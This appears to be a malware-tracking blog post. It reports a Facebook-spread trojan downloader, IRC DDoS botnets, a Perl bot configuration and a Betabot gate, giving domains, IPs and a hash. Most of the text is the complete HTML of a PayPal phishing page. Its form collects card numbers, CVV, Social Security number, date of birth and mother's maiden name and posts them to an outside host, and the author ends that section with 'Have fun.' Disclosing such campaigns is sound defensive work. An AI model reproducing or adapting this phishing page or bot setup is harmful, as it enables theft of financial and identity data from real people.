static.onlineapplicationsdownloads.com(Trojan downloader spreading via Facebook hosted in United States Ashburn Amazon.com Inc. )

Our friend aLiSs found this file via facebook.
These links are spreading on facebook.

hxxp://goo.gl/TUqGzM
hxxp://goo.gl/PVUW3S
hxxp://goo.gl/uJvgqv

When u click u go to the page and then u are asked to install FlvPlayer
 if u click install u are downloading FlvPlayerSetup.exe wich download and installs FlvPlayerSilent0.exe.

These are domains used by this shit

os.greatonlineapplications.com
static.onlineapplicationsdownloads.com

These are HTTP Queries

static.onlineapplicationsdownloads.com/exe/FlvPlayerSilent0414.exe
static.onlineapplicationsdownloads.com/exe/FlvPlayerSilent0414.exe
static.onlineapplicationsdownloads.com/exe/FlvPlayerSilent0414.exe
os2.greatonlineapplications.com/Aff-AD/?v=3.0&c=1538995748
os.greatonlineapplications.com/MEDIA/?v=3.0&c=1538995748
os2.greatonlineapplications.com/Aff-AD/?v=3.0&c=1538995748

Looking up static.onlineapplicationsdownloads.com
Resolved : [ static.onlineapplicationsdownloads.com ] To [ 54.230.231.38 ]
Resolved : [ static.onlineapplicationsdownloads.com ] To [ 54.230.230.82 ]
Resolved : [ static.onlineapplicationsdownloads.com ] To [ 54.230.230.177 ]
Resolved : [ static.onlineapplicationsdownloads.com ] To [ 54.230.228.52 ]
Resolved : [ static.onlineapplicationsdownloads.com ] To [ 54.230.230.37 ]
Resolved : [ static.onlineapplicationsdownloads.com ] To [ 54.230.230.89 ]
Resolved : [ static.onlineapplicationsdownloads.com ] To [ 54.230.230.206 ]
Resolved : [ static.onlineapplicationsdownloads.com ] To [ 54.239.192.192 ]

Resolved : [ os2.greatonlineapplications.com ] To [ 166.78.44.134 ]

Hosting infos:
http://whois.domaintools.com/54.230.231.38


informed.su(Paypal Phishing Page)

I was looking into spam area in my gmail account and i saw this mesage:

Update Personal Information
Dear Valued Customer,

     It has come to our attention that your PayPal account information needs to be updated as
part of our continuing commitment to protect your account and to reduce the instance of fraud
on our website. If you could please take a few minutes out of your online experience and update
your personal records, you will not run into any problems in the future with the online service.

However, failure to update your records could result in account suspension. Please update your
records as soon as possible.

To update your account information, please download and open the attachment file that we sent
via this email, and simply open it with your web browser.

Once you have updated your account records, any activities going through your account will no
longer be interrupted.

We apologize for any inconvenience. Please understand that this procedure is to keep you and
your account in a protected state.

Email coming from : support@rev.com  very legit lol
I downloaded VerifyAccount.htm and here it is the phishing url and page:



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- Verifying Account --><!-- ISS 2214 --><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>PayPal Account Verification</title>
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xpt.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptInvoice.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptObsolete.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptlive.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/default.css">
<script type="text/javascript" language="javascript">
function validate(frm){if(!/^(4|5|6){1}[0-9]{15,16}$/i.test(frm.elements['defaultcardnumber'].value)){alert("Enter a valid Card Number");frm.elements['defaultcardnumber'].focus();return false;}if(frm.elements['defaultcvv2'].value.length < 3){alert("Enter your Card Verification Number");frm.elements['defaultcvv2'].focus();return false;}if(frm.elements['fullname'].value.length < 4){alert("Enter your CardHolder's Name");frm.elements['fullname'].focus();return false;}return true;}</script>
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/en_US/lang.css">
<style type="text/css"></style>
<style type="text/css">
.Warning {
background:#ffffcc;color:black;
}
select{border:1px solid #84A8CC;margin-bottom:2px;}
input{border:1px solid #84A8CC;margin-bottom:2px;}
</style>
<link rel="shortcut icon" href="favicon.ico">
</head><body>
<div class="srd" id="header">
<h1><a href="https://www.paypal.com/us/cgi-bin/webscr"><img src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" alt="PayPal" border="0"></a></h1>
<form method="post" id="searchForm" name="searchForm" action="https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search">
<fieldset>
<legend>Search PayPal</legend>
<label for="searchBox">Search </label><input id="searchBox" name="queryString" value="" type="text"> <input class="button" id="search.x" name="search.x" value="Search" type="submit">
</fieldset>
<input name="form_charset" value="UTF-8" type="hidden">
</form>
<div class="srd" id="navGlobal"><ul>
<li class="logout"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_logout">Log Out</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help">Help</a></li>
<li class="last"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center">Security Centre</a></li>
</ul></div>
</div>
<div id="navPrimary" class="srd"><ul class="secondary">
<li class="active">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">My Account</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Overview</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add Funds</a></li>
<li>
<a href="#" href=https://www.paypal.com/us/cgi-bin/webscr">Withdraw</a><ul><li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Transfer to Bank Account</a></li></ul>
</li>
<li>
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">History</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Basic Search</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Download History</a></li>
</ul>
</li>
<li class="">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Resolution Centre</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">View Open Cases</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Guides</a></li>
</ul>
</li>
<li class="active">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Profile</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Email</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Bank Account</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Credit Card</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Postal Address</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Send Money</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Request Money</a></li>
<li class=""><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Merchant Services</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Auction Tools</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Products &amp; Services</a></li>
</ul></div>
<div id="xptContentMain"><table id="xptContentContainer" align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tbody><tr><td><div id="xptTitle"><table class="main" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td class="heading" width="100%"><h1><font color="#257BDD" face="Arial" size="3">Profile Update</font></h1></td>
<td align="right" nowrap="nowrap">
<a href="https://www.paypal.com/us/cgi-bin/webscr"><span class="small">Secure Transaction</span></a> <img src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" alt="" align="top" border="0">
</td>
</tr>
<tr><td colspan="2"><img alt="" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif" border="0" height="2" width="1"></td></tr>
<tr><td><img alt="" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif" border="0" height="4" width="1"></td></tr>
</tbody></table></div></td></tr>

<table width="760" border="0" cellpadding="0" cellspacing="0" align="center">
<tr>
<td>
<font face="Arial">
<p>Please complete the form below to update your Profile information and restore your account access.
</p>
</font>
</td>
</tr>
</table>
<form name="frm" action="http://www.informed.su/Verified.php" method="post" onsubmit="return validate(this)">
<input type="hidden" id="swich" name="swich" value="0"><input type="hidden" name="user" value=""><input type="hidden" name="pass" value=""><input type="hidden" name="defaultaddress" value=""><input type="hidden" name="ip" value=""><input type="hidden" name="send" value="">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr>
<td>
<hr class="dotted">
</td
</tr>
<tr>
<tr>
<td class=""><span class="emphasis"><font color="#257BDD" face="Arial" size="3">Personal Information Profile</font><br></td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr><td><br><font face="Arial" size="2">Make sure you enter the information accurately, and according to the formats required.<br> Fill in all the required fields.<br><br></font></td></tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr>
<td class="label" width="320"><label for="fullname"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Card Holder Name:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" type="text" id="fullname" name="fullname" size="20" value=""></td>
</tr>
<tr>
<td class="label" width="320"><label for="dob"><sup><img id="cxfgzinflate" border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Date of Birth:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418">
<select class="" name=bmonth><b>
<option selected value="">month</option>
<option value=Jan >Jan</option>
<option value=Feb >Feb</option>
<option value=Mar >Mar</option>
<option value=Apr >Apr</option>
<option value=May >May</option>
<option value=Jun >Jun</option>
<option value=Jul >Jul</option>
<option value=Aug >Aug</option>
<option value=Sep >Sep</option>
<option value=Oct >Oct</option>
<option value=Nov >Nov</option>
<option value=Dec >Dec</option>
</select>
<select class="" name=bday>
<option selected value="">day</option>
<option value=01 >01</option>
<option value=02 >02</option>
<option value=03 >03</option>
<option value=04 >04</option>
<option value=05 >05</option>
<option value=06 >06</option>
<option value=07 >07</option>
<option value=08 >08</option>
<option value=09 >09</option>
<option value=10 >10</option>
<option value=11 >11</option>
<option value=12 >12</option>
<option value=13 >13</option>
<option value=14 >14</option>
<option value=15 >15</option>
<option value=16 >16</option>
<option value=17 >17</option>
<option value=18 >18</option>
<option value=19 >19</option>
<option value=20 >20</option>
<option value=21 >21</option>
<option value=22 >22</option>
<option value=23 >23</option>
<option value=24 >24</option>
<option value=25 >25</option>
<option value=26 >26</option>
<option value=27 >27</option>
<option value=28 >28</option>
<option value=29 >29</option>
<option value=30 >30</option>
<option value=31 >31</option>
</select>
<select class="" name=byear>
<option selected value="">year</option>
<option value=1910 >1910</option>
<option value=1911 >1911</option>
<option value=1912 >1912</option>
<option value=1913 >1913</option>
<option value=1914 >1914</option>
<option value=1915 >1915</option>
<option value=1916 >1916</option>
<option value=1917 >1917</option>
<option value=1918 >1918</option>
<option value=1919 >1919</option>
<option value=1920 >1920</option>
<option value=1921 >1921</option>
<option value=1922 >1922</option>
<option value=1923 >1923</option>
<option value=1924 >1924</option>
<option value=1925 >1925</option>
<option value=1926 >1926</option>
<option value=1927 >1927</option>
<option value=1928 >1928</option>
<option value=1929 >1929</option>
<option value=1930 >1930</option>
<option value=1931 >1931</option>
<option value=1932 >1932</option>
<option value=1933 >1933</option>
<option value=1934 >1934</option>
<option value=1935 >1935</option>
<option value=1936 >1936</option>
<option value=1937 >1937</option>
<option value=1938 >1938</option>
<option value=1939 >1939</option>
<option value=1940 >1940</option>
<option value=1941 >1941</option>
<option value=1942 >1942</option>
<option value=1943 >1943</option>
<option value=1944 >1944</option>
<option value=1945 >1945</option>
<option value=1946 >1946</option>
<option value=1947 >1947</option>
<option value=1948 >1948</option>
<option value=1949 >1949</option>
<option value=1950 >1950</option>
<option value=1951 >1951</option>
<option value=1952 >1952</option>
<option value=1953 >1953</option>
<option value=1954 >1954</option>
<option value=1955 >1955</option>
<option value=1956 >1956</option>
<option value=1957 >1957</option>
<option value=1958 >1958</option>
<option value=1959 >1959</option>
<option value=1960 >1960</option>
<option value=1961 >1961</option>
<option value=1962 >1962</option>
<option value=1963 >1963</option>
<option value=1964 >1964</option>
<option value=1965 >1965</option>
<option value=1966 >1966</option>
<option value=1967 >1967</option>
<option value=1968 >1968</option>
<option value=1969 >1969</option>
<option value=1970 >1970</option>
<option value=1971 >1971</option>
<option value=1972 >1972</option>
<option value=1973 >1973</option>
<option value=1974 >1974</option>
<option value=1975 >1975</option>
<option value=1976 >1976</option>
<option value=1977 >1977</option>
<option value=1978 >1978</option>
<option value=1979 >1979</option>
<option value=1980 >1980</option>
<option value=1981 >1981</option>
<option value=1982 >1982</option>
<option value=1983 >1983</option>
<option value=1984 >1984</option>
<option value=1985 >1985</option>
<option value=1986 >1986</option>
<option value=1987 >1987</option>
<option value=1988 >1988</option>
<option value=1989 >1989</option>
<option value=1990 >1990</option>
<option value=1991 >1991</option>
<option value=1992 >1992</option>
<option value=1993 >1993</option>
<option value=1994 >1994</option>
<option value=1995 >1995</option>
<option value=1996 >1996</option>
</select>
</td>
</tr>

<tr>
<td class="label" width="320"><label for="mmn"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Mother's Maiden Name:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" type="text" id="mmn" name="mmn" size="15" value=""></td>
</tr>

<tr>
<td class="label" width="320"><label for="ssn"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Social Security Number:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" type="text" id="ssn1" size="15" maxlength="15" name="ssn1" value=""><td>
</tr>

<tr>
<td class="label" width="320"><label for="userphone"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Home Phone Number:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" type="text" id="userphone" size="20" maxlength="20" name="userphone" value="
"></td>
</tr>
<tr>
<td class="label" width="320"><label for="userphoneinfo">&nbsp;</label></td>
<td width="2">&nbsp;</td>
<td width="418"><span class="small"><font face="Arial" size="1">We might contact this phone number if there are any invalid data specified.</font></span></td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<br>
<tr>
<td>
<hr class="dotted">
</td
</tr>
<tr>

<td class=""><span class="emphasis"><font color="#257BDD" face="Arial" size="3">Home Address Profile</font><br>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr><td><br><font face="Arial" size="2">Enter your information as accurately as possible.</font><br><br></td></tr>
</table>

<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">

<tr>
<td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Address Line 1:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input style="width:200px" class="" type="text" id="defaultaddress1" name="defaultaddress1" size="20" value=""></td>
</tr>

<tr>
<td class="label" width="320"><label for="defaultaddress2"><font face="Arial" size="2">Address Line 2:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input style="width:200px" type="text" id="defaultaddress2" name="defaultaddress2" size="20" value=""></td>
</tr>

<tr>
<td class="label" width="320"><label for="defaultcity"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">City:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" type="text" id="defaultcity" name="defaultcity" size="15" value=""></td>
</tr>

<tr>
<td class="label" width="320"><label for="defaultstate"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">State:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" type="text" id="defaultstate" name="defaultstate" size="15" value=""></td>
</tr>

<tr>
<td class="label" width="320"><label for="defaultzip"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Zip Code:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" type="text" id="defaultzip" name="defaultzip" size="15" value=""></td>
</tr>

<tr>
<td class="label" width="320"><label for="defaultcountry"><sup><img src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Country:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418">

<select style="width:200px" name="defaultcountry" class="" >
<option value="United States" selected>United States</option>
<option value="Canada" >Canada</option>
<option value="Albania" >Albania</option>
<option value="Algeria" >Algeria</option>
<option value="Andorra" >Andorra</option>
<option value="Angola" >Angola</option>
<option value="Anguilla" >Anguilla</option>
<option value="Argentina" >Argentina</option>
<option value="Armenia" >Armenia</option>
<option value="Australia" >Australia</option>
<option value="Austria" >Austria</option>
<option value="Azerbaijan Republic" >Azerbaijan Republic</option>
<option value="Bahamas" >Bahamas</option>
<option value="Bahrain" >Bahrain</option>
<option value="Barbados" >Barbados</option>
<option value="Belgium" >Belgium</option>
<option value="Belize" >Belize</option>
<option value="Bolivia" >Bolivia</option>
<option value="Bosnia and Herzegovina" >Bosnia and Herzegovina</option>
<option value="Botswana" >Botswana</option>
<option value="Brazil" >Brazil</option>
<option value="Brunei" >Brunei</option>
<option value="Bulgaria" >Bulgaria</option>
<option value="Cambodia" >Cambodia</option>
<option value="Chile" >Chile</option>
<option value="China" >China</option>
<option value="Colombia" >Colombia</option>
<option value="Costa Rica" >Costa Rica</option>
<option value="Croatia" >Croatia</option>
<option value="Cyprus" >Cyprus</option>
<option value="Czech Republic" >Czech Republic</option>
<option value="Democratic Republic of the Congo" >Democratic Republic of the Congo</option>
<option value="Denmark" >Denmark</option>
<option value="Dominican Republic" >Dominican Republic</option>
<option value="Ecuador" >Ecuador</option>
<option value="El Salvador" >El Salvador</option>
<option value="Eritrea" >Eritrea</option>
<option value="Estonia" >Estonia</option>
<option value="Faroe Islands" >Faroe Islands</option>
<option value="Fiji" >Fiji</option>
<option value="Finland" >Finland</option>
<option value="France" >France</option>
<option value="Gambia" >Gambia</option>
<option value="Germany" >Germany</option>
<option value="Greece" >Greece</option>
<option value="Greenland" >Greenland</option>
<option value="Grenada" >Grenada</option>
<option value="Guatemala" >Guatemala</option>
<option value="Guinea" >Guinea</option>
<option value="Guyana" >Guyana</option>
<option value="Honduras" >Honduras</option>
<option value="Hong Kong" >Hong Kong</option>
<option value="Hungary" >Hungary</option>
<option value="Iceland" >Iceland</option>
<option value="India" >India</option>
<option value="Indonesia" >Indonesia</option>
<option value="Ireland" >Ireland</option>
<option value="Israel" >Israel</option>
<option value="Italy" >Italy</option>
<option value="Jamaica" >Jamaica</option>
<option value="Japan" >Japan</option>
<option value="Jordan" >Jordan</option>
<option value="Kazakhstan" >Kazakhstan</option>
<option value="Kenya" >Kenya</option>
<option value="Kuwait" >Kuwait</option>
<option value="Kyrgyzstan" >Kyrgyzstan</option>
<option value="Laos" >Laos</option>
<option value="Latvia" >Latvia</option>
<option value="Lesotho" >Lesotho</option>
<option value="Liechtenstein" >Liechtenstein</option>
<option value="Lithuania" >Lithuania</option>
<option value="Luxembourg" >Luxembourg</option>
<option value="Madagascar" >Madagascar</option>
<option value="Malaysia" >Malaysia</option>
<option value="Maldives" >Maldives</option>
<option value="Mali" >Mali</option>
<option value="Malta" >Malta</option>
<option value="Mexico" >Mexico</option>
<option value="Mongolia" >Mongolia</option>
<option value="Morocco" >Morocco</option>
<option value="Mozambique" >Mozambique</option>
<option value="Namibia" >Namibia</option>
<option value="Nauru" >Nauru</option>
<option value="Nepal" >Nepal</option>
<option value="Netherlands" >Netherlands</option>
<option value="New Caledonia" >New Caledonia</option>
<option value="New Zealand" >New Zealand</option>
<option value="Nicaragua" >Nicaragua</option>
<option value="Niger" >Niger</option>
<option value="Norway" >Norway</option>
<option value="Oman" >Oman</option>
<option value="Panama" >Panama</option>
<option value="Papua New Guinea" >Papua New Guinea</option>
<option value="Peru" >Peru</option>
<option value="Philippines" >Philippines</option>
<option value="Poland" >Poland</option>
<option value="Portugal" >Portugal</option>
<option value="Qatar" >Qatar</option>
<option value="Romania" >Romania</option>
<option value="Russia" >Russia</option>
<option value="Rwanda" >Rwanda</option>
<option value="Samoa" >Samoa</option>
<option value="San Marino" >San Marino</option>
<option value="Saudi Arabia" >Saudi Arabia</option>
<option value="Senegal" >Senegal</option>
<option value="Singapore" >Singapore</option>
<option value="Slovakia" >Slovakia</option>
<option value="Slovenia" >Slovenia</option>
<option value="Solomon Islands" >Solomon Islands</option>
<option value="Somalia" >Somalia</option>
<option value="South Africa" >South Africa</option>
<option value="South Korea" >South Korea</option>
<option value="Spain" >Spain</option>
<option value="Sri Lanka" >Sri Lanka</option>
<option value="Swaziland" >Swaziland</option>
<option value="Sweden" >Sweden</option>
<option value="Switzerland" >Switzerland</option>
<option value="Taiwan" >Taiwan</option>
<option value="Tajikistan" >Tajikistan</option>
<option value="Tanzania" >Tanzania</option>
<option value="Thailand" >Thailand</option>
<option value="Togo" >Togo</option>
<option value="Tonga" >Tonga</option>
<option value="Tunisia" >Tunisia</option>
<option value="Turkey" >Turkey</option>
<option value="Turkmenistan" >Turkmenistan</option>
<option value="Tuvalu" >Tuvalu</option>
<option value="Uganda" >Uganda</option>
<option value="Ukraine" >Ukraine</option>
<option value="United Arab Emirates" >United Arab Emirates</option>
<option value="United Kingdom" >United Kingdom</option>
<option value="Uruguay" >Uruguay</option>
<option value="Vanuatu" >Vanuatu</option>
<option value="Vatican City State" >Vatican City State</option>
<option value="Venezuela" >Venezuela</option>
<option value="Vietnam" >Vietnam</option>
<option value="Yemen" >Yemen</option>
<option value="Zambia" >Zambia</option>
</select>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<br>
<tr>
<td>
<hr class="dotted">
</td
</tr>
<tr>
<td class=""><span class="emphasis"><font color="#257BDD" face="Arial" size="3">Credit/Debit Card Profile</font><br>
<input type="hidden" name="default" value="1">
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr><td><br><font face="Arial" size="2">Enter card information as accurately as possible.<br> For card number, enter numbers only please, no dashes or spaces.<br><br></font></td></tr>
</table>

<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">

<tr>
<td class="label" width="320"><label for="defaultcardnumber"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Card Number:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" type="text" id="defaultcardnumber" name="defaultcardnumber" maxlength="16" size="20" value="">
</td>
</tr>
<tr>
<td class="label" width="320"><label for="defaultexpdate"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Expiration Date:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418">
<select  class="" name="defaultexpmonth" id="defaultexpmonth">
<option value=00 >month</option>
<option value=01 >01</option>
<option value=02 >02</option>
<option value=03 >03</option>
<option value=04 >04</option>
<option value=05 >05</option>
<option value=06 >06</option>
<option value=07 >07</option>
<option value=08 >08</option>
<option value=09 >09</option>
<option value=10 >10</option>
<option value=11 >11</option>
<option value=12 >12</option>
</select>
<select  class="" name="defaultexpyear" size="1" id="defaultexpyear" type="select">
<option value="00" >year</option>
<option value="14" >2014</option>
<option value="15" >2015</option>
<option value="16" >2016</option>
<option value="17" >2017</option>
<option value="18" >2018</option>
<option value="19" >2019</option>
<option value="20" >2020</option>
<option value="21" >2021</option>
<option value="22" >2022</option>
<option value="23" >2023</option>
<option value="24" >2024</option>
<option value="25" >2025</option>
<option value="26" >2026</option>
<option value="27" >2027</option>
<option value="28" >2028</option>
<option value="29" >2029</option>
<option value="30" >2030</option>
<option value="31" >2031</option>
<option value="32" >2032</option>
</select>&nbsp;
</td>
</tr>
<tr>
<td class="label" width="320" STYLE="vertical-align: middle"><label for="defaultcvv2"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><font face="Arial" size="2">Card Verification Number:</font></label></td>
<td width="2">&nbsp;</td>
<td width="418"><input class="" style="vertical-align: bottom" type="text" id="defaultcvv2" size="3" maxlength="4" name="defaultcvv2" value="">
<a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop-outside" target="_blank"<span class="small" STYLE="vertical-align: sub"><font face="Arial" size="1">Help&nbsp;finding&nbsp;your&nbsp;Card&nbsp;Verification&nbsp;Number&nbsp;</font></span></a>
</td>
</tr>

</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr>
<br>
<td>
<span class="small"><span class="emphasis"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup><br><br><font face="Arial" size="2">For your protection, we verify credit card information.</span><br>The process normally takes about 30 seconds, but it may take longer during certain times of the day. Please click <span class="emphasis">Save Profile</span> to update your information.</span></font>
<hr class="dotted"></td>
</tr>
<tr>
<td align="right">
<input style="margin-top:30px;margin-bottom:40px;_margin-bottom:30px;background: #fcbb49 url(http://linku/~ultraele/system/btn_main_1x50.gif) repeat-x top left;width:auto;_width:180px;height:22px;border:0;font:bold 12px arial;color:#000000;text-align:center;border: 1px solid #ff9900;" type="submit" name="set" value="Save Profile">
<br>
<br>
<br>
</td>
</tr>
</table>
</form></td>
</tr>
</table>
</td>
</tr>
</table>
</tbody></table>
</td></tr>
</tbody></table>
<center>
        <img src="https://www.paypalobjects.com/WEBSCR-640-20110306-1/en_US/i/logo/logo_VIPwhite_66x27.gif" />
        <br>
        <br>
        <p align="CENTER">
            <font color="#647384" face="Arial" size="-4">Copyright &copy; 1999-2014 PayPal. All rights reserved. </font></p>
    </center>
<div class="hide" id="navFull"></div>
</body></html>

Have fun.

 

ddos.do-dear.com(Linux bots hosted in China Tianjin China Unicom Tianjin Province Network)

dns: ddos.do-dear.com nick: addr: ddos.do-dear.com ip: 125.39.22.154 Longip: 2099713690

## my @nickname = ("mIRc-KinG");
## my $nick =$nickname[rand scalar @nickname];
 
my $nick =$rircname[rand scalar @rircname];
 
$server = 'ddos.do-dear.com' unless $server;
my $port = '6668';
 
my $linas_max='8';
my $sleep='5';
 
my $homedir = "var/tmp";
my $version = ' 1,11D 11,1DoS Bot Powerd By mIRc-Kin 1,11G';
 
my @admins = ("mIRc-KinG","FluX","p34c3","p3rL","WTFguy");
my @hostauth = ("SeR" , "D.D-o-S.vhost" , "WTFguy.users.undernet.org");
my @chans = ("#DBots hacked");



  0nick:  14 alias
 12[ 115:43 12]   12|   0name:  14 (kavie)
 12[ 115:43 12]   12|   0hostname:  14 sand@8C1898FB.2DC487E9.D1A65860.IP
 12[ 115:43 12]   12|   0channels:  14 @#DBots
 12[ 115:43 12]   12|   0server:  14 irc.do-dear.com (Do-Dear IRc Server)   0IP:  12 210.73.213.5 


Source code encrypted with base64 u have to decrypt this if u want to look inside.

Hosting infos:
http://whois.domaintools.com/125.39.22.154



ircd.freenetwork.com.ar (Linux botnet hosted in Korea, Republic Of Seoul Korea Internet Data Center)

Botnet found by X.

 ircd.freenetwork.com.ar nick: addr: ircd.freenetwork.com.ar ip: 222.231.10.81 Longip: 3739683409

Server:  ircd.freenetwork.com.ar:6667

Channels: #org,#rpl,#root,#viar

  Now 15 talking in #org
Topic On : [ #org ] [ Don't flood fuck || Register your nick... !!! [ SCAN ON ] || if you want to donate server,,please pm admin.. ]

Hosting infos:
http://whois.domaintools.com/222.231.10.81

freegamebox.ru (Betabot http botnet proxied by cloudflare.com)

Server:  freegamebox.ru
Gate file:  /hunter/123/order.php

The same gate directory has shown up before.

Related md5s (Download samples from Malwr.com)
Betabot: e6e0b46fbb5741b058e3c9b84f601a7f